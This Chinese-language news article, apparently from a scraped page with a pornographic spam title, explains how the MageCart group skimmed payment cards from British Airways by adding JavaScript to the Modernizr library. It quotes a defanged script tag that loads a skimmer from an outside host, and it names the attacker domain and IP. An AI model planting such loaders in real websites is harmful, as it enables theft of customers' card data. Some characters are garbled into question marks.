亚洲日本免费-啊轻点灬太粗太长了三男一女-麻豆av电影在线观看-日韩一级片毛片|www.grbbt.com

研究人員進(jìn)行的調(diào)查顯示，英國航空公司數(shù)據(jù)泄露事件追查到是一個(gè)名為MageCart的犯罪團(tuán)伙。該組織自2015年以來一直活躍，并且許多電子商務(wù)網(wǎng)站遭到破壞，以竊取支付卡和其他敏感數(shù)據(jù)。該小組在目標(biāo)網(wǎng)站中注入一個(gè)skimmer?腳本來虹吸支付卡數(shù)據(jù)，一旦攻擊者成功破壞了網(wǎng)站，它就會(huì)在HTML模板中添加嵌入的Javascript。

下面是一個(gè)名為MagentoCore的示例腳本??。

<script type=”text/javascript” src=”hxxps://magentocore.net/mage/mage.js”></script>

此??腳本??記錄客戶的擊鍵并將其發(fā)送到受攻擊者控制的服務(wù)器。

攻擊者植入javascript代碼竊取數(shù)據(jù)

根據(jù)研究人員的說法，MageCart小組對(duì)英國航空公司進(jìn)行了有針對(duì)性的攻擊，并使用該腳本的定制版本來進(jìn)行持續(xù)性攻擊。

黑客使用專用基礎(chǔ)設(shè)施來對(duì)這家航空公司進(jìn)行特定攻擊。

“這次襲擊中使用的基礎(chǔ)設(shè)施只是考慮到了英國航空公司，故意針對(duì)的腳本將與正常的支付處理融為一體，以避免被發(fā)現(xiàn)。我們?cè)谟蛎鸼aways.com上看到了這方面的證據(jù)???以及丟棄服務(wù)器路徑。“

專家分析了網(wǎng)站加載的所有腳本，并搜索了最近的變化證據(jù)。

專家注意到Modernizr JavaScript庫中的一些變化，攻擊者在底部添加了一些代碼行，以避免給腳本帶來問題。JavaScript庫于格林威治標(biāo)準(zhǔn)時(shí)間8月21日20:49修改。

惡意腳本是從英國航空公司網(wǎng)站上的行李認(rèn)領(lǐng)信息頁面加載的，攻擊者添加的代碼允許Modernizr將付款信息從客戶發(fā)送到攻擊者的服務(wù)器。

該腳本允許攻擊者從網(wǎng)站和移動(dòng)應(yīng)用程序中竊取用戶的數(shù)據(jù)。

從英國航空公司竊取的數(shù)據(jù)以JSON的形式發(fā)送到baways.com上托管的服務(wù)器，該服務(wù)器類似于航空公司使用的合法域。

攻擊者使用SSL防止被發(fā)現(xiàn)

攻擊者從Comodo購買了SSL證書，以避免引起懷疑

“該域名???位于89.47.162.248，位于羅馬尼亞，實(shí)際上是位于立陶宛的名為Time4VPS的VPS提供商的一部分。演員還為服務(wù)器加載了SSL證書。有趣的是，他們決定使用Comodo的付費(fèi)證書而不是免費(fèi)的LetsEncrypt證書，這可能使它看起來像一個(gè)合法的服務(wù)器：“繼續(xù)RiskIQ。

目前還不清楚MageCart如何在英國航空公司網(wǎng)站上設(shè)法注入惡意代碼。

“正如我們?cè)谶@次襲擊中看到的那樣，?Magecart?建立了定制的，有針對(duì)性的基礎(chǔ)設(shè)施，專門與英國航空公司網(wǎng)站融為一體，盡可能避免被發(fā)現(xiàn)。雖然我們永遠(yuǎn)無法知道攻擊者在英國航空公司服務(wù)器上的覆蓋范圍，但他們能夠修改該站點(diǎn)的資源這一事實(shí)告訴我們?cè)L問權(quán)限很大，并且他們可能在攻擊開始之前就已經(jīng)訪問了很久關(guān)于面向網(wǎng)絡(luò)的資產(chǎn)的脆弱性，這是一個(gè)明顯的提醒。“RiskIQ總結(jié)道。